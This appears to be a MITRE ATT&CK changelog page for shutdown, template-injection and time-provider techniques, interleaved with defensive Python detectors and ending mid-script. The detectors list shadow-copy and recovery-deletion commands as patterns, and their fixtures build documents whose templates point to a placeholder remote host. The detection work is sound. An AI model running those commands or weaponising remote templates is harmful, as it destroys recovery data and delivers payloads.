| Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Austin Clark, @c2defense'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 21:18:48.149000+00:00 | 2022-10-20 18:27:57.587000+00:00 |
| description | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) |
| external_references[1]['source_name'] | Microsoft Shutdown Oct 2017 | Talos Nyetya June 2017 |
| external_references[1]['description'] | Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019. | Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown | https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html |
| external_references[2]['source_name'] | Talos Nyetya June 2017 | alert_TA18_106A |
| external_references[2]['description'] | Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019. | CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022. |
| external_references[2]['url'] | https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html | https://www.cisa.gov/uscert/ncas/alerts/TA18-106A |
| x_mitre_data_sources[1] | Command: Command Execution | Sensor Health: Host Status |
| x_mitre_data_sources[2] | Sensor Health: Host Status | Command: Command Execution |
| x_mitre_detection | Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. | Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the reload command. |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Shutdown Oct 2017', 'description': 'Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown'} | |
| x_mitre_platforms | Network |
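The updated detection text above points at Event ID 1074 (the User32 "process X initiated a shutdown" record), Event ID 6006, process monitoring, and the `reload` command on network devices. The following is an added example, not code from the page or from MITRE ATT&CK, of how those signals can be triaged together: a 1074 event is rated by which binary initiated it and by whether recovery-inhibiting commands (`vssadmin delete shadows`, `bcdedit ... recoveryenabled no`, `wbadmin delete catalog`) ran on the same host shortly before, which is the "shutdown after impacting the system in other ways" pattern the description mentions. The event records, the allowlist of expected initiators, and the AAA command-accounting lines are all constructed for the example; the 1074 message text is an approximation of the Windows string, not a verbatim copy.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (not from the page). Field names are modelled on
# Windows System log Event ID 1074 and Security log Event ID 4688.
EVENTS = [
    {"ts": "2024-05-01T10:00:00", "host": "WS01", "id": 4688,
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-05-01T10:00:05", "host": "WS01", "id": 4688,
     "cmd": "bcdedit.exe /set {default} recoveryenabled no"},
    {"ts": "2024-05-01T10:01:00", "host": "WS01", "id": 1074,
     "msg": "The process C:\\Windows\\system32\\shutdown.exe (WS01) has initiated the "
            "restart of computer WS01 on behalf of user CORP\\svc_backup for the "
            "following reason: Other (Unplanned)\r\n Reason Code: 0x500ff\r\n "
            "Shutdown Type: restart\r\n Comment: "},
    {"ts": "2024-05-01T18:30:00", "host": "WS02", "id": 1074,
     "msg": "The process C:\\Windows\\Explorer.EXE (WS02) has initiated the power off "
            "of computer WS02 on behalf of user CORP\\alice for the following reason: "
            "Other (Unplanned)\r\n Reason Code: 0x500ff\r\n Shutdown Type: power off"
            "\r\n Comment: "},
]

# Pulls the initiating process, action, target host and user out of a 1074 message.
EVENT_1074 = re.compile(
    r"The process (?P<proc>.+?) \((?P<src>[^)]+)\) has initiated the "
    r"(?P<action>restart|shutdown|power off) of computer (?P<target>\S+) "
    r"on behalf of user (?P<user>\S+)"
)

# Command lines associated with Inhibit System Recovery (T1490).
RECOVERY_INHIBIT = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
]

# Assumed allowlist of binaries that normally initiate a shutdown on a workstation;
# tune it per environment (patch management agents will need adding).
EXPECTED_INITIATORS = {"explorer.exe", "wininit.exe", "winlogon.exe"}


def _ts(s):
    return datetime.fromisoformat(s)


def triage_shutdowns(events, window_minutes=15):
    """One finding per Event ID 1074, rated high when recovery-inhibiting commands
    ran on the same host inside the look-back window, medium when an unexpected
    binary initiated the shutdown, low otherwise."""
    findings = []
    window = timedelta(minutes=window_minutes)
    for ev in events:
        if ev["id"] != 1074:
            continue
        m = EVENT_1074.search(ev["msg"])
        if not m:
            continue
        t = _ts(ev["ts"])
        preceded_by = [
            e["cmd"] for e in events
            if e["id"] == 4688 and e["host"] == ev["host"]
            and t - window <= _ts(e["ts"]) <= t
            and any(p.search(e["cmd"]) for p in RECOVERY_INHIBIT)
        ]
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()
        unexpected = proc not in EXPECTED_INITIATORS
        severity = "high" if preceded_by else ("medium" if unexpected else "low")
        findings.append({"host": ev["host"], "ts": ev["ts"], "proc": proc,
                         "action": m.group("action"), "user": m.group("user"),
                         "unexpected_initiator": unexpected,
                         "preceded_by": preceded_by, "severity": severity})
    return findings


# Constructed AAA command-accounting lines (TACACS+-style); the format is
# illustrative. On network devices the equivalent of shutdown.exe is `reload`.
ACCT_LINES = [
    "May  1 10:02:11 rtr1 tac_plus: user=ops01 cmd=show version",
    "May  1 10:02:40 rtr1 tac_plus: user=ops01 cmd=reload in 5",
    "May  1 10:03:00 sw2 tac_plus: user=admin cmd=copy running-config startup-config",
]
RELOAD_CMD = re.compile(r"\bcmd=(reload|reboot|request system reboot)\b")


def find_reload_commands(lines):
    """Return accounting lines in which a reload/reboot command was issued."""
    return [line for line in lines if RELOAD_CMD.search(line)]


if __name__ == "__main__":
    for f in triage_shutdowns(EVENTS):
        print(f["severity"], f["host"], f["proc"], f["user"], f["preceded_by"])
    for line in find_reload_commands(ACCT_LINES):
        print("reload:", line)
```

The look-back join is the part that earns its keep: on its own, `shutdown.exe` run by a service account is noise on many fleets, and a 1074 event alone says nothing about intent, but a shadow-copy deletion followed within minutes by a reboot from the same host is exactly the Nyetya/Olympic Destroyer sequence the description cites. Event ID 6006 marks the clean stop of the event log service and is useful mainly as a timestamp to bound the host's outage.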
| Old Description | New Description |
|---|---|
| Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. 
(Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016) | Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-29 14:37:59.462000+00:00 | 2022-01-12 18:16:56.176000+00:00 |
| description | Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. 
(Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016) | Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016) |
| external_references[5]['source_name'] | Anomali Template Injection MAR 2018 | Proofpoint RTF Injection |
| external_references[5]['description'] | Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018. | Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021. |
| external_references[5]['url'] | https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104 | https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread |
| external_references[6]['source_name'] | Talos Template Injection July 2017 | Ciberseguridad Decoding malicious RTF files |
| external_references[6]['description'] | Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018. | Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021. |
| external_references[6]['url'] | https://blog.talosintelligence.com/2017/07/template-injection.html | https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/ |
| external_references[7]['source_name'] | ryhanson phishery SEPT 2016 | Anomali Template Injection MAR 2018 |
| external_references[7]['description'] | Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018. | Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018. |
| external_references[7]['url'] | https://github.com/ryhanson/phishery | https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104 |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation |
| x_mitre_detection | Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior. | Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.
Monitor .rtf files for strings indicating the *\template control word has been modified to retrieve a URL resource, such as *\template http or *\template \u-. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Talos Template Injection July 2017', 'description': 'Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.', 'url': 'https://blog.talosintelligence.com/2017/07/template-injection.html'} | |
| external_references | {'source_name': 'ryhanson phishery SEPT 2016', 'description': 'Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.', 'url': 'https://github.com/ryhanson/phishery'} | |
| x_mitre_contributors | Michael Raggi @aRtAGGI |
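The revised description covers two carriers of a remote template reference: the `attachedTemplate` relationship in an OOXML package and the `\*\template` control word in RTF, and the revised detection text gives the RTF strings to look for. The following is an added example, not code from the page or from MITRE ATT&CK, of a scanner for both. For OOXML it opens the ZIP, reads every `.rels` part and reports `attachedTemplate` relationships whose target is external (`TargetMode="External"` or a URL/UNC target); for RTF it extracts the `{\*\template ...}` group and reports targets that are URLs, UNC paths, or `\u-` escaped. The minimal `.docx` builder and the RTF byte strings are constructed sample input for the scanner (the docx omits parts a real document needs), and the IP addresses are documentation-range placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
ATTACHED_TEMPLATE = R_NS + "/attachedTemplate"

# A target that leaves the package: URL scheme, or a UNC path.
REMOTE_TARGET = re.compile(r"(?i)^(?:[a-z][a-z0-9+.-]*://|\\\\)")


def build_docx(template_target, external=True):
    """Construct a minimal .docx in memory whose settings part carries an
    attachedTemplate relationship. Sample input only: it omits document.xml and
    [Content_Types].xml, which the scanner does not need."""
    settings = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                f'<w:attachedTemplate r:id="rId1"/></w:settings>')
    mode = ' TargetMode="External"' if external else ''
    rels = (f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_target}"{mode}/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def scan_docx(data):
    """Return (rels part, target) for every attachedTemplate relationship that
    points outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" or REMOTE_TARGET.match(target):
                    hits.append((name, target))
    return hits


# {\*\template <target>} : the group the detection text refers to.
RTF_TEMPLATE = re.compile(rb"\{\\\*\\template\s*([^}]*)\}", re.I)
RTF_REMOTE = re.compile(rb"(?i)^(?:[a-z][a-z0-9+.-]*://|\\\\)")


def scan_rtf(data):
    """Return the template targets in an RTF file that are remote or \\u- escaped.
    A plain local path in \\*\\template is a legitimate document property."""
    hits = []
    for m in RTF_TEMPLATE.finditer(data):
        target = m.group(1).strip()
        if RTF_REMOTE.match(target) or b"\\u-" in target:
            hits.append(target.decode("latin-1"))
    return hits


# Constructed RTF samples: one with a remote template, one with a local one.
SAMPLE_RTF_REMOTE = (rb"{\rtf1\ansi\deff0{\*\template http://198.51.100.7/t.rtf}"
                     rb"{\fonttbl{\f0 Arial;}}\f0 Quarterly report\par}")
SAMPLE_RTF_LOCAL = rb"{\rtf1\ansi{\*\template C:\Templates\Normal.dotm}Hello\par}"


if __name__ == "__main__":
    print(scan_docx(build_docx("http://198.51.100.7/t.dotm")))
    print(scan_docx(build_docx("Normal.dotm", external=False)))
    print(scan_rtf(SAMPLE_RTF_REMOTE), scan_rtf(SAMPLE_RTF_LOCAL))
```

Two caveats a production scanner needs that this one does not: a `.docx` can carry external relationships in parts other than settings (image, hyperlink and OLE relationships are the usual ones), and in RTF the `\u-` form only matters because Word decodes the escaped URL before fetching it, so a byte-level grep for `http` alone misses it; the `\u-` check above is what catches that variant.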
| Old Description | New Description |
|---|---|
| Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) |
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 15:24:26.476000+00:00 | 2022-04-20 16:31:16.715000+00:00 |
| description | Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) |
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017) |
| external_references[1]['source_name'] | Microsoft W32Time Feb 2018 | Github W32Time Oct 2017 |
| external_references[1]['description'] | Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018. | Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018. |
| external_references[1]['url'] | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top | https://github.com/scottlundgren/w32time |
| external_references[2]['source_name'] | Microsoft TimeProvider | Microsoft W32Time May 2017 |
| external_references[2]['description'] | Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. | Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018. |
| external_references[2]['url'] | https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings |
| external_references[3]['source_name'] | Github W32Time Oct 2017 | Microsoft W32Time Feb 2018 |
| external_references[3]['description'] | Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018. | Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018. |
| external_references[3]['url'] | https://github.com/scottlundgren/w32time | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top |
| external_references[4]['source_name'] | Microsoft W32Time May 2017 | Microsoft TimeProvider |
| external_references[4]['description'] | Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018. | Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. |
| external_references[4]['url'] | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings | https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx |
| x_mitre_detection | Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) |
Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
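The detection text above says to baseline the `W32Time\TimeProviders` subkeys and watch for changes. The following is an added example, not code from the page or from MITRE ATT&CK, of that baseline comparison: a collector that snapshots each provider's `DllName`, `Enabled` and `InputProvider` values through `winreg` on a live Windows host, and a pure analysis function that flags providers missing from the baseline, providers whose DLL path changed, and DLLs outside System32. The baseline (the `NtpClient`/`NtpServer` providers backed by `w32time.dll` and the Hyper-V `VMICTimeProvider`) and the assumption that `%SystemRoot%` is `C:\Windows` are mine and should be confirmed against a known-good host; the snapshot the script analyzes by default is constructed so that the analysis runs on any platform.

```python
import sys

W32TIME_KEY = r"SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders"

# Assumed baseline of stock providers and their DLLs; verify on a known-good build.
BASELINE = {
    "NtpClient": r"%systemroot%\system32\w32time.dll",
    "NtpServer": r"%systemroot%\system32\w32time.dll",
    "VMICTimeProvider": r"%systemroot%\system32\vmictimeprovider.dll",
}

# Constructed snapshot: two stock providers plus a third registered from ProgramData.
SAMPLE_SNAPSHOT = {
    "NtpClient": {"DllName": r"%systemroot%\system32\w32time.DLL",
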